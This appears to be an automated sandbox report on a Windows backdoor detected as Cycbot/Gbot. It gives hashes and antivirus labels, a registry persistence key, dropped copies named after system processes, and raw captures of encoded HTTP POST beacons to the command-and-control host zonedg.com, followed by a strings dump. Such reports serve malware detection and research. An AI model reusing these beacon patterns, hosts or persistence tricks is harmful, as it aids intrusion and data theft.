Analysis Date2015-01-17 01:20:34
MD5c3408982d204cf571cc50e9e7bea4639
SHA198355e0e72eb3dd9cac31e94d2bee4068584fb97

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6f2ee89e7e79371646770e65aa1d5bca sha1: dba22d6f52603e3bec2db912bbdc878b726d12bd size: 121344
Section.rdata md5: f1e44ad0356567bbf92bf918fd660956 sha1: d7df6423f52cf3ba69337e86da7f71ee566d16ce size: 1024
Section.data md5: c992439c8346bfbecc8787913244dadc sha1: 4046e1eb5e9c8a10fb11d1e47e54f9e176fc55f8 size: 75264
Section.reloc md5: 8acd90928fc1afb5ac7bc167abdd7ada sha1: 27915cd5f336e2685a3070279e07b8745d1f11c1 size: 1024
Timestamp2005-09-20 01:49:39
PEhash69a677b81c8ffd96bc0172ebe3dfa1edb5d07ff7
IMPhash92a1d669de6ff010ee1be0d055b34161
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.70
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.THG
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.ogk
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSonlinedatingsecretfriends.com
Winsock DNSyourmediaresources.com
Winsock DNSyourblogresources.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSonlinedatingsecretfriends.com
Type: A
DNSyourblogresources.com
Type: A
DNSyourmediaresources.com
Type: A
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqJSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 4a537225 32466525 32425635   2BsqJSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53253246   ij%2B82uYvEaS%2F
0x000000c0 (00192)   54253242 73714e53 72253246 65253242   T%2BsqNSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53505425   ij%2B8CiYvEaSPT%
0x000000c0 (00192)   32427371 74693852 704c3666 68537225   2Bsqti8RpL6fhSr%
0x000000d0 (00208)   32466525 32425635 5a755267 25334425   2Fe%2BV5ZuRg%3D%
0x000000e0 (00224)   33442048 5454502f 312e310d 0a486f73   3D HTTP/1.1..Hos
0x000000f0 (00240)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x00000100 (00256)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000110 (00272)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000120 (00288)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)   70f5ed                                p..


Strings
5W..
.@
.
:
.
.u
.O
.
.
?
.
`

080904b0
1.0.0.1
2097
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````
<<<@@@@@@@
>>>>>>>
>>>>>>>>>
>>>>>>>>>>
|||||||
|,``* 
|*@`=}
      
;;;;;;
;;;;;;;;;;
::::::::::::
???????
//////
///////
''''''
"""""""""
"""""""""""""
(  [`"
(((((((
(((((((((
)))))))))
)))))))))))
[_________________
]]]]]]]]]]]];;
@)`, `
@@@@@@
$@@\!(
$$$$$$$
$$$$$$$$$$$
******
&&&&&&&&&)))
#######
##########
%%%%%%%%%
%%%%%%%%%%$$$$
(  0&@`
000000
0000000
0A~3;o
+0cAB|
0eee|````````uu
0NHmHi
)0oM>A
0Q}NSQ4
\:0uH/
0''''''ZZZZZZ
````1::::
` $`@1%
111111
111111111
11111111111
1COWKd
-1Do}j
;!2*@ 
?+20NrKR=zA
22222222
-----222222222222
2Ey\I+G
`@& `2H
&2i0ykv2
2j	g4,
2PnQJ.
3333333d
33b'w.@ 
34#UCr
3A1oFy
+'*3C^#
3~JlCC
3pc%oFfQp
3Qml@~
3#SncQ
@&`@\3Z
 4;( `
4^3v}d"
4444		
4444444
444446
4J+#wAf0
4.Q6Nx
"  '4R 
4`~@W1o'p
_____________4;xN0
??55555
55555555555555
5,i7|W
^6&%@5
6666$$$$$$$$$$
666666
66666666666666
666666666666666666666
6z7Und
77999999991
+7G{2 `
%:7GGxgiDKg 
7\;h.u
 _<	7V
88888888888MM{
8888888yyyyyyyyy
8#dS>W
@8fh*`
8II<<<<
8Nwim?S
999999999
9999999994444444
:9HnKZ
9>)&.U5
9{{Vl:oV]
9!XJ3X
`\-{A':
~A@"@ 
aaaaaaa?
aaaaaaaaaaaaa
AApppppppppp[jjj
a@FN"@`
(Afq#]
#avSN3Zk
awTLLQ
aY3eI2
a(``zJS[78YG{2:e
B*` *`
B3hUl2
bh7#Rs
B"hAF<
b_n}%}
BPMX;%l
BsyE<a
Bz|s]{
``C.` 
[>*`@C
C22222222   
c6Rp9a
cccc^^^^^
Cdi}^p
CdneExD
ci5&m7
c!  @J0X
CLP6&@`
C* @NU
cQv*5]{>
d0?eA{
@.data
DCC;2Yf
DDDDDD
ddddddddddddddd
ddddddddddddddddd
..(((((DDDDDDDDDDDDDDDDD
(`@d<DfC
-D~e|K
d&:`GnyS
Di)I}'
D$I<Z)
@@D^Q]
DQ4N|'u
DuplicateHandle
dX1@3Jt
~dYs$ 
E`0 S3e
E2/=(929M$
/e5}cQw_
eeeeee
` +Efs,
eFU%Lx
EnumResourceNamesW
@^eRsd
EUND;!
'E\~xrkr
}E&@`Y
%F* @?
{F7#WMj 
ffffVVV`
f -.ig
FindClose
FindFirstFileA
FindResourceExA
FlushInstructionCache
{"@@Fr
frj3h5
%^FRtX
F;S^X'
	g4$#.
g.@`8_
g9lPyE
 gaSbO
Gazjuhu
G+ethw.M
GetModuleFileNameW
'G`'Gb
gggggggggg
GGGGGGGGGG7
ggggggggggggggg||
GR8W?A
G:,rOV
@gRX9b
 gSz~p1|
#\G$&V?
hhhhhh
hhhhhhhhhhhhh
hhhhhhhhhhhhhhhhh
hiC)k3
hjjjjjjjjjj~~~~
Hl;LMbk7
hpwO&h 9
hRsxFY
&h:%>V
HZjE;B
<_*@`I
%_i7LE
Ic9QTU9
iiAAAAAAAAAAAAAAAA
$@`iiI
{{{IIIII
IIIII,
iiiiiiii
ir@8G?
J0Q,  e<
j}CH5xH
jIU?)cC&`@
jj????????????
jj`0*s
JJJJJJJ
JJJJJJJJJJ
JJJJJJJJJJJJ
&&&&jjjjjjjjjjjjj
J&@ k `
JOoW?`-R
JpnOQK-
[!JQFF
j.``w$
k5BWW5
kbIAFK
KC-CS>
kD'R1m
KERNEL32.dll
kgD?|8"
K}=_H,
   kkk_____
\\\\KKK
kkkkkkk
kkkkkkk???
Knc/Ub
kUaX[k
kv;=Nrv
;kW$hM9Y-B
k=XAQ^
Kzeux)%u
L& @{;
'l1D,@`
l=ap%O
:L&DT%
LFx%Cx,
lllll^DDD
lllllll
lllvvvvv
@lnD~v 
lZfU7V
Lzhi=k
`@m, @
	m* `;
>M?ABek
MapViewOfFile
_Mc0A9]
[mFJXf
m]J="5
-ml)BU
mmmmmmmm"
MMMMMMMMMMMM
MMrXAiw
MMxxxx
,:Mrf3
mz<M=i
:#N"@`
N4\4afD"@
N8\"YQ
NdrComplexArrayFree
[NEX#B
	"nF-I
``N( @g
]Ni*KU"
NJsNaD
nj=ui(ANz
$$$$&&NNN
NNNN****
nnnnnn
@@NNNNNN
n@RdTc
`n'w94
NWQi3af
o#$ `?
 @O&`@
oA&` ]A
OA	%F/J
oBq\2/
Oe6-8i
OF'LZm
og>|r	Sn
OG	Scw
 OHOP=aC
OJu.;&[
o'k_&&
*oooooo
OOOOOO
ooooooo
OOOOOOOOOOOOO
ooooooooooooooo
OSC3f+A
@@P. @/*
P6$ `m
p9K:}[
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
p&a&uN
P"Dd0;
+P#hA#
PL&hVFUb
@`po	^
PpKj*~j
ppoX8l
pppppppp
ppppppppppppGGGGGGGG
PPPPPPPPPPPPPP
P sGih
  pY.@
 Q4t).`
q77wwww
qFcDE8'8
`#qiOTfA
 @Q	j9
Qk{|t\/ry}
qK	W"n>
qLkG8w$ 
'Qqm	B
QQQLLLL
QQQQQQ
qqqqqqq
qqqqqq__________SSg
Qqx!#4N
qrk1/c
QuU7q)
R2wq(2
r38*vl9
R'8Vy<1  
R'+bc0`}!
Rc1=IY
`.rdata
.reloc
<RE,"&M
r>+f%a+
RLA|\!#
RPCRT4.dll
rrB^[|
RRRRRR
rrrrrrrr
rW5W{6
S3$Kpf
s 9]x2
sADlaYj
S)]d( 
SetLocaleInfoW
SHELL32.dll
Shell_NotifyIconA
SHGetValueW
SHLWAPI.dll
SlLppO0w
(	Sm;Z
SOF|j-A&
SSSSSaaa		
ssssss
sssssssr
ssssssssss
SSSSSSSSSSrrrrrrrrrrrrrrrrr
sssssssssss
)"  T!`=
@@@@@@T
{&T5:H
Tci<=V
!This program cannot be run in DOS mode.
tI,@`a
timeEndPeriod
`|T+<k
tkG(` :
tLCdUlv
'tqjQ*
tttoooooooF
}}tuEf
?txB@K
U+1G0]
U2q9/&`
Uct@$``5me&
#UhoN(`
`u{l+:R
UnmapViewOfFile
UuidCreate
UUUUUU
uuuuuuu
UUUUUUUUUU
<<<<<<<UUUUUUUUUUUU
UVFw*@
@U$@ ~y
V8ij,7
vL5[7iZX
_v(``p
VPI	*#!
\VQvjD
VrY:jU
vvvvvv
,` w&`
W376,d
\w=44$x_v
_wB91B
#WF:nO
wpa0u:
wqL'N:
W:)t_`
W-uS6%<
WWWWWWWW
wwwwwwwww
"wwwwwwwwwwwww
WWWWWWWWWWWWWWWWN
x^\3_^L
x(8#@q
Xd\Pg!~
x&FAR<
x%j:{yl
X<^m-r3s
%xmY>+>
XRRRRRRR
XstbcJ
XX[[[""
XXXXXXXX
xxxxxxxxxxx
@`xZE:
y^^^^^^>>>>>>
YahrOu
Ygf~-/+
Y_gf5K
yj>&``a
ySXdaK
+Yxr]W
YYYYYYYYY
YYYYYYYYYYYYY
>y>$  z
 `*`@z
Z|:,@ 
z0,'JJ
Z\2o5>
Z6K\32\6.
}ZbN9ZZ
Z(/[BSM
ZhhoA#!
#Zi4EAy
`*@ ZL-
ZNaEx^'N
ZSeVV|
zT]k2u
[zVvYt
`[ZZjll
zzzzz8888888LLL        
zzzzzz
ZZZZZZ
ZZZZZZZZZZZZ
zzzzzzzzzzzzz
ZZZZZZZZZZZZZZZZ